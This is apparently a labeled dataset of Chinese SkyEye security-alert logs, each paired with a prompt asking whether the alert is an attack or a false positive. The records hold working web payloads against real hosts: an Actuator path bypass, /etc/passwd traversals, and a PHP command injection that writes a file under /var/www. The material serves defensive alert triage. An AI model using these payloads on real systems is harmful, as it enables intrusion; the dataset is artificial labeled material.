"attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "42.194.198.71", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "470", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL2hoL29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBydjo1NC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksemgtQ047cT0wLjgsemg7cT0wLjcNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MA0KRE5UOiAxDQpSZWZlcmVyOiBodHRwczovL3d3dy5nb29nbGUuY29tLw0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KWC1Gb3J3YXJkZWQtRm9yOiAxMjcuMC4wLjENCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_57a7b19352a02e93f02fbf4a19dc5764", "access_time": "2024-11-27 14:34:45", "attack_addr": "中国--广东省--广州市(23.116548/113.295827)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "42.194.198.71", "dimension": "3", "url_path": "/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Firefox/68.0\", \"hw_type\": \"PC\"}}", "sport": "58044", "h_url": "/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688228", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "配置不当/错误", "_origin": {"write_date": 1732688228, "vuln_harm": "此类请求行为一旦成功,攻击者可通过访问敏感信息实施进一步的攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 251, "uri": "/_next/../../../../../../../../../../etc/passwd", "dport": 30001, "vuln_name": "发现尝试请求Linux下敏感文件", "rsp_status": 0, "code_language": "其他", "solution": "对此类敏感请求进行拦截。", "hit_start": 231, "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "public_date": "2018-08-30 16:27:11", "sport": 12882}, "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/_next/../../../../../../../../../../etc/passwd", "first_access_time": "2024-11-27 14:17:08", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现尝试请求Linux下敏感文件", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "7e0dbaa5943b4ce9063c03616affb27b", "xff": "", "vuln_desc": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "attack_chain": "0x01020000", "vuln_harm": "此类请求行为一旦成功,攻击者可通过访问敏感信息实施进一步的攻击。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688207", "code_language": "其他", "public_date": "2018-08-30 16:27:11", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "251", "h_proto_version": "HTTP/1.1", "uri": "/_next/../../../../../../../../../../etc/passwd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020571", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现尝试请求Linux下敏感文件", "attack_type": "默认配置不当", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "对此类敏感请求进行拦截。", "hit_start": "231", "skyeye_id": "", "payload": {"req_header": "R0VUIC9fbmV4dC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_c479b51d7be58f7f377d713d10120b06", "access_time": "2024-11-27 14:17:08", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160C0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/_next/../../../../../../../../../../etc/passwd", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567921-发现尝试请求Linux下敏感文件", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12882", "h_url": "/_next/../../../../../../../../../../etc/passwd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688228", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732688228, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 251, "uri": "/_next/../../../../../../../../../../etc/passwd", "dport": 30001, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 231, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "223.160.174.104", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 12882}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/_next/../../../../../../../../../../etc/passwd", "first_access_time": "2024-11-27 14:17:08", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "4a381433886e37721b3ade444f084734", "xff": "", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "attack_chain": "0x02010000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688207", "code_language": "通用", "public_date": "2018-08-16 18:57:22", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "251", "h_proto_version": "HTTP/1.1", "uri": "/_next/../../../../../../../../../../etc/passwd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055d", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "231", "skyeye_id": "", "payload": {"req_header": "R0VUIC9fbmV4dC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_6f6f5c2912b7e05e83a2f4d2ff8ee254", "access_time": "2024-11-27 14:17:08", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/_next/../../../../../../../../../../etc/passwd", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12882", "h_url": "/_next/../../../../../../../../../../etc/passwd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688228", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732688228, "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/_next/../../../../../../../../../../etc/passwd", "dport": 30001, "vuln_name": "路径穿越攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "public_date": "2020-11-25 19:44:53", "sport": 12882}, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/_next/../../../../../../../../../../etc/passwd", "first_access_time": "2024-11-27 14:17:08", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "路径穿越攻击(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "73ed63534b4802be01885ac668a0544d", "xff": "", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "attack_chain": "0x02010000", "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688207", "code_language": "", "public_date": "2020-11-25 19:44:53", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/_next/../../../../../../../../../../etc/passwd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6b", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "路径穿越攻击(机器学习)", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9fbmV4dC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_e4f68be2f46c584583e814af9162ba79", "access_time": "2024-11-27 14:17:08", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/_next/../../../../../../../../../../etc/passwd", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569451-路径穿越攻击(机器学习)", "rule_labels": "{}", "sport": "12882", "h_url": "/_next/../../../../../../../../../../etc/passwd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688218", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688218, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 76, "uri": "/web/addons/ftp_download.php", "dport": 30001, "vuln_name": "PHP代码执行攻击", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 56, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "223.160.174.104", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2018-09-13 16:03:57", "sport": 12874}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "4f37e888f36b870236c4182b407092a0", "rule_key": "webids", "api": "218.76.15.56:30001/web/addons/ftp_download.php", "first_access_time": "2024-11-27 14:16:58", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "fdac32a0203c499d7bfde4b715c2e014", "xff": "", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02010000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688198", "code_language": "PHP", "public_date": "2018-09-13 16:03:57", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "76", "h_proto_version": "HTTP/1.1", "uri": "/web/addons/ftp_download.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020593", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "PHP代码执行攻击", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "56", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvd2ViL2FkZG9ucy9mdHBfZG93bmxvYWQucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDEwMg0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "YWN0aW9uPXN0b3Bfam9icyZ0YXNrbmFtZT0nO2VjaG8gJzw/cGhwIGVjaG8gbWQ1KCJvb2FoaiIpO3VubGluayhfX0ZJTEVfXyk7Pz4nID4gL3Zhci93d3cvdmdzbGtzLnBocDsn", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_5d152be37629b6d53e594b7a1e6a875b", "access_time": "2024-11-27 14:16:58", "content-length": "102", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/web/addons/ftp_download.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "ftp_download.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /web/addons/ftp_download.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 102\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "action=stop_jobs&taskname=';echo '<?php echo md5(\"ooahj\");unlink(__FILE__);?>' > /var/www/vgslks.php;'", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567955-PHP代码执行攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12874", "h_url": "/web/addons/ftp_download.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688218", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688218, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 0, "uri": "/web/addons/ftp_download.php", "dport": 30001, "vuln_name": "PHP代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "223.160.174.104", "vuln_desc": 